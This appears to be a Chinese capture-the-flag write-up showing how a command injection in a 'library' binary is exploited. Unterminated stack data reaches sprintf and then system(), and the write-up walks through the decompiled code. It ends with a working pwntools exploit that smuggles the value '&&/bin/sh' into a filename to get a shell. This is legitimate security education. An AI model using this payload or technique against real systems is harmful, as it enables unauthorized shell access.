0x00 前言
這種命令行注入在pwn中出現的比較少,所以記錄分享一下。
0x01 命令行注入介紹
熟悉web安全的話就知道,如果對特殊字符過濾不當,會引發sql注入或者xss等安全漏洞。其中,命令行注入較為嚴重,因為可以直接拿到漏洞程序當前權限的OSshell。
然而,命令行注入不僅在web中會出現,在C語言程序中,也會出現命令行注入的漏洞。比方說這道pwn題,就是調用system時,沒有對輸入數據進行\0截斷以及對特殊字符處理不當而導致的。
命令行注入相對於其他二進制漏洞相比利用比較簡單,比方說這道題,舉個例子:
sprintf(&s, "du -sh lib/'%s'", v6);
system(&s);
其中設計初衷,v6應當是一個合法的文件名。但是如果攻擊者惡意操控v6,比方說,讓v6為:'&&/bin/sh'進行sprintf拼接後,system所執行的命令為:
du -sh lib/''&&/bin/sh''
這裡有兩個linux命令行的知識:
&&,這是拼接兩個命令,如果我們執行 command1&&command2,那麼等價於先執行command1在執行command2。其中命令跟&&之間不必加空格。
在命令後不加空格的''(兩個單引號)會被忽略,比如ls''等價於ls,/bin/sh''等價於/bin/sh,du -sh lib/''等價於du -sh lib/(即,實際傳進去的參數是lib/不是lib/'')
所以,執行上面的命令,相當於先執行了
du -sh lib/
再執行
/bin/sh
所以,可以getshell。
0x02 題目
題目所給的是一個library的服務,可以上傳book,查看books,清除books。其中,book存放在lib/文件夾中。
0x03 漏洞點
char *list_books()
{
FILE *v0; // eax
char *result; // eax
char s; // [esp+4h] [ebp-C14h]
char ptr; // [esp+804h] [ebp-414h]
char *v4; // [esp+C04h] [ebp-14h]
FILE *stream; // [esp+C08h] [ebp-10h]
char *v6; // [esp+C0Ch] [ebp-Ch]
v0 = popen("ls lib/", "r");
stream = v0;
result = (char *)fread(&ptr, 1u, 0x400u, v0);
v4 = result;
if ( result )
{
v6 = strtok(&ptr, delims);
result = (char *)send("Book list:\nSize\tE-book\n");
while ( v6 )
{
sprintf(&s, "du -sh lib/'%s'", v6);
//很明顯,這裡存在可能的命令行注入
system(&s);
fflush(stdout);
result = strtok(0, delims);
v6 = result;
}
}
return result;
其中list_books代碼如上,v6來自fread從popen中的返回結果。他本來想做的是輸出每個文件的大小,但是fread後沒有用\0截斷。所以調用strtok時,可能會讀到fread後面的垃圾數據(當然如果可以操控的話就不是垃圾數據了)
sprintf的棧溢出會比較難利用,因為&s比較大,有0x800,而v6是從&ptr裡面strtok出來的,而&ptr更小,只有0x400。所以應該沒法很好的利用。
0x04 操控垃圾數據
那麼,我們怎麼去操控&ptr中的垃圾數據呢?這個時候看看另外一個函數
int upload_book()
{
char *v1; // eax
int v2; // eax
char buf[1024]; // [esp+Ch] [ebp-42Ch]
char s[20]; // [esp+40Ch] [ebp-2Ch]
FILE *stream; // [esp+420h] [ebp-18h]
char *dest; // [esp+424h] [ebp-14h]
size_t v7; // [esp+428h] [ebp-10h]
int v8; // [esp+42Ch] [ebp-Ch]
if ( book_counter > 10 )
return send("too many books\n");
send("Book filename: ");
v8 = __isoc99_scanf("%20s", s);
if ( v8 != 1 )
return send("Wrong title format\n");
v7 = strlen(s);
if ( strcmp(&s[v7 - 3], ".bk") )
return send("The name needs to end with '.bk'\n");
send("e-book contents: \n");
read(0, buf, 0x400u);
if ( *(_DWORD *)buf != 'BBBB' )
return send("Not an e-book\naborting...\n");
v1 = (char *)malloc(0x18u);
dest = v1;
*(_DWORD *)v1 = 0x2F62696C;
v1[4] = 0;
strcat(dest, s);
stream = fopen(dest, "w");
if ( !stream )
return send("Bad book filename\n");
v2 = book_counter++;
books[v2] = dest;
fwrite(buf, 1u, 0x400u, stream);
return fclose(stream);
}
其中,這在棧中也會分配0x400個字節,並且我們可以寫入。
並且,調用完這個函數之後,清除棧空間時,只是簡單地add
esp,xxx,並不會清空其中數據。然後,再調用存在命令行注入的函數並分配棧空間時,也只是單純地sub
esp,xxx,也不會清空數據。在C語言中,如果此時對不賦值的局部變量直接訪問的話,是UB行為。但是,從二進制安全的角度看的話,便是可利用的點了。其中這道題,本身就是一個局部字符串讀取後未截斷而造成的UB,然而我們便可以利用這個。
那麼來試試:
很明顯,BBBB123456789123456789123456789123456789AAAA的後面89123456789AAAA被拼接到du -sh lib/'%s'中了
動態調試看一下的話
第一次在system停下
第二次在system停下
所以很明顯,只要把89123456789AAAA改成
'&&/bin/sh'\\x00
就可以getshell了。如前面所說。
其中,\\x00是我們自己手動截斷,不然strtok還會繼續往後讀。
所以最後exp
#BBBB1234567891234567891234567'&&/bin/sh'
g_local = True
from pwn import *
if g_local:
sh=process("./library")
else:
sh=remote("xxxx",1234)
def upload_book(filename, content):
filename += ".bk"
sh.send("1\n")
sh.recvuntil("Book filename: ")
print filename
sh.send(filename + "\n")
sh.recvuntil("e-book contents: \n")
sh.send(content)
sh.recvuntil("Enter command: ")
def list_books_and_shell():
sh.send("2\n")
sh.interactive()
upload_book("1", "BBBB1234567891234567891234567\'&&/bin/sh\'\\x00")
list_books_and_shell()
0x05 後言
還有一點要注意,pwndbg好像會默認在fork時跟子進程,所以要在~/.gdbinit的最後面(加載pwndbg之後)加上set follow-fork-mode parent。並且,&&與命令之間不能加空格。因為他strtok是通過空格和換行分斷字符串的,加了空格我們的payload就會被strtok分割開。
閱讀更多 看雪學院 的文章
